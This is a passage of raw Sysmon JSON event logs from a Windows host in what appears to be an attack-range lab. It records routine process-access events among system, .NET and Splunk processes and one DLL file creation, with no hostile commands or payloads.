07:01:00.012","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.027\r\nSourceProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nSourceProcessId: 752\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.027","SourceProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","SourceProcessId":"752","SourceThreadId":"3144","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.105\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.105","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.105\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.105","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.105\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.105","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001029870B00}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:00.231\r\nProcessGuid: {E2A3D6B1-132C-5F25-0000-001029870B00}\r\nProcessId: 5068\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13cc-0\\Microsoft.Build.Conversion.v4.0.dll\r\nCreationUtcTime: 2020-08-01 07:01:00.231","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:00.231","ProcessGuid":"{E2A3D6B1-132C-5F25-0000-001029870B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13cc-0\\Microsoft.Build.Conversion.v4.0.dll","CreationUtcTime":"2020-08-01 07:01:00.231","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.262\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.262","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.262\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.262","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.277\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00101D8B0B00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 